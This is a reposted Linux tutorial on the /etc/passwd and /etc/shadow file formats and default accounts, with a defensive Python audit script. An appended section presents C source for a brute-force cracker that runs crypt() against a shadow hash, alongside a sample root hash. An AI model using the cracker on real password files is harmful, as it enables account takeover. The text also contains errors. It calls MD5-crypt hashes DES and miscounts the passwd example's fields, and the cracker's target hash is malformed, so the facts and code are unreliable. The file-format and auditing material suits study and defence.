(The first part below is reposted from the web.)
In Linux, the password file is /etc/passwd. In earlier versions, this file stored the encrypted password directly: the first two characters are the "salt" value, a random number, and they are followed by the encrypted password. For security, current Linux systems provide the /etc/shadow file. The password is stored in that file, which is readable only by the root user.
The following is an analysis of the /etc/passwd file. Each entry has seven fields:
name:password:user ID:group ID:user information:home directory:shell
Example: ynguo:x:509:510:/home/ynguo:/bin/bash
When the shadow file is used, the password field is shown as an x, so the password is invisible to ordinary users. If you look closely at this file, you will find some strange user names. They are the system's default accounts, and default accounts are a common way for attackers to get into a system. You must therefore be familiar with the default accounts and pay special attention to whether their password field is empty. The default accounts are described below.
adm: has account files; its initial directory, /var/adm, usually contains log files
bin: has the executable files for user commands
daemon: used to run system daemon processes
games: used to play games
halt: used to execute the halt command
lp: has the printer spool files
mail: has mail-related processes and files
news: has Usenet-related processes and files
nobody: used by NFS (Network File System)
shutdown
sync: used to execute the sync command
uucp: has UUCP tools and files
Traditionally, /etc/passwd is world-readable, because many applications need it to convert a UID to a user name. For example, without access to /etc/passwd, the ls -l command displays UIDs instead of user names. However, password-guessing programs make a readable /etc/passwd that contains encrypted passwords a huge security risk. This is why the shadow file /etc/shadow appeared.
The shadow password system splits the password file into two parts, /etc/passwd and /etc/shadow. The shadow file stores the encrypted passwords, and every password in /etc/passwd is replaced with x. The shadow file can be read only by the root user, which ensures security. Each line of /etc/shadow has the following format:
username:encrypted password:last modification time (days since January 1, 1970):minimum number of days between password changes:number of days before the password is changed:number of days after the password expires:number of days since January 1, 1970 on which the account is disabled:reserved field
Example:
root:$1$t4sfphbq$jxgsggvkgbdd/d7fvvbbm0:11037:0:99999:7:-1:-1:1075498172
bin:*:11024:0:99999:7:::
daemon:*:11024:0:99999:7:::
By default, password update is disabled. If your system has not enabled the shadow file, run the pwconv program.
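A check a defender can run over the two files described above, as an added example that is not part of the original post: it flags empty password fields, hashes left in /etc/passwd and entries with the wrong field count, and names the hash scheme from its `$id$` prefix. The function names, the sample entries and the policy of treating DES and `$1$` (MD5-crypt) as weak are assumptions of this example.

```python
# Prefix ids from crypt(5); a 13-character field with no "$" is legacy DES.
SCHEMES = {"1": "md5crypt", "5": "sha256crypt", "6": "sha512crypt", "y": "yescrypt"}
WEAK = {"des", "md5crypt"}
NOTE = {"empty": "empty password field", "malformed": "malformed entry"}

def classify(field):
    """Return (state, scheme, salt) for a passwd or shadow password field."""
    if field == "":
        return ("empty", None, None)
    if field == "x":
        return ("shadowed", None, None)
    if field[0] in "*!":
        return ("locked", None, None)
    parts = field.split("$")                 # ['', id, (params,) salt, hash]
    if field.startswith("$") and len(parts) >= 4:
        return ("hash", SCHEMES.get(parts[1], "unknown"), parts[-2])
    if len(field) == 13:
        return ("hash", "des", field[:2])    # first two characters are the salt
    return ("malformed", None, None)

def audit(passwd_text, shadow_text):
    """Return sorted (user, finding) pairs for entries that need attention."""
    found = []
    for src, text, want in (("passwd", passwd_text, 7), ("shadow", shadow_text, 9)):
        for line in text.strip().splitlines():
            cols = line.split(":")
            ok = len(cols) == want           # passwd has 7 fields, shadow has 9
            state, scheme, _ = classify(cols[1]) if ok else ("malformed", None, None)
            if state in NOTE:
                found.append((cols[0], f"{src}: {NOTE[state]}"))
            elif state == "hash" and src == "passwd":
                found.append((cols[0], "passwd: hash in world-readable file"))
            elif state == "hash" and scheme in WEAK:
                found.append((cols[0], f"shadow: weak scheme {scheme}"))
    return sorted(found)

# Constructed sample data; the hash strings are placeholders, not real hashes.
PASSWD = """root:x:0:0:root:/root:/bin/bash
games::12:100:games:/usr/games:/sbin/nologin
olduser:abPLACEHOLDER:600:600::/home/olduser:/bin/sh
broken:x:700:700:/home/broken:/bin/sh"""
SHADOW = """root:$1$saltsalt$PLACEHOLDER:11037:0:99999:7:-1:-1:
bin:*:11024:0:99999:7:::
news::11024:0:99999:7:::
ynguo:$6$saltsalt$PLACEHOLDER:14576:0:99999:7:::"""

if __name__ == "__main__":
    for user, finding in audit(PASSWD, SHADOW):
        print(f"{user:8} {finding}")
```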
####################
Added by iceknife on 20100601
####################
Shadow uses DES encryption. For brute-force cracking, you can use a dictionary attack.
For example:
username:$1$jmzjgk//$do9jjam9tqhvhkh3esytt.:14576:0:99999:7:::
Suppose we know in advance that the password for username is 123456. How can we get that password?
Use the crypt(char *key, char *salt) function, and link with -lcrypt.
crypt() is the password encryption function. It is based on the Data
Encryption Standard algorithm with variations intended (among other
things) to discourage use of hardware implementations of a key search.
key is a user's typed password.
salt is a two-character string chosen from the set [a-zA-Z0-9./]. This
string is used to perturb the algorithm in one of 4096 different ways.
Here key = 123456
salt = $1$jmzjgk//$
The result obtained by crypt is $1$jmzjgk//$do9jjam9tqhvhkh3esytt.
The following is the source code of a brute-force cracker.
/*
 ============================================================================
 Name        : descrack.c
 Author      : iceknife
 Version     :
 Copyright   : Your copyright notice
 Description : Hello world in C, ANSI-style
 ============================================================================
 */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <crypt.h>   /* declares crypt(); link with -lcrypt */
#include <pthread.h>

char data[37] = "abcdefghijklmnopqrstuvwxyz0123456789"; /* candidate alphabet */
char *goalpass = "$1$aa133...$gxpqgkio3cu6dncle";       /* hash to match */
char mypwd[10];                                         /* current candidate */
int minlen = 1; // min password length
int maxlen = 3; // max password length

/* Hash the current candidate with the target's salt and compare the result. */
static void check(void)
{
    char *hash = crypt(mypwd, "$1$aa133...$");
    if (hash != NULL && !strcmp(goalpass, hash))
    {
        printf("find password: %s\n", mypwd);
        exit(0);
    }
}

/* Try every character at position index, then recurse into later positions. */
void subgenerate(int index, int pwdlen)
{
    if (index == pwdlen)
        return;
    int i;
    for (i = 0; i < 36; i++)
    {
        mypwd[index] = data[i];
        memset(mypwd + index + 1, data[0], pwdlen - index - 1);
        if (i != 0) /* i == 0 was already checked by the caller */
        {
            // printf("%s ", mypwd);
            check();
        }
        subgenerate(index + 1, pwdlen);
    }
}

/* Walk the first character over data[start..end) for passwords of pwdlen. */
void generate(int pwdlen, int start, int end)
{
    int i;
    for (i = start; i < end; i++) // multi-thread segmentation
    {
        mypwd[0] = data[i];
        memset(mypwd + 1, data[0], pwdlen - 1); // fill length
        // printf("%s ", mypwd);
        check();
        subgenerate(1, pwdlen);
    }
}

int main()
{
    if (maxlen > 9)
    {
        /* mypwd holds at most 9 characters plus the terminating NUL */
        puts("max password length must be at most 9");
        return 1;
    }
    int i;
    for (i = minlen; i <= maxlen; i++)
    {
        printf("\npassword length: %d\n", i);
        // Password length
        memset(mypwd, 0, 10);
        generate(i, 0, 36); // whole alphabet; start/end reserved for multithreading
    }
    puts("password not found");
    return 0;
}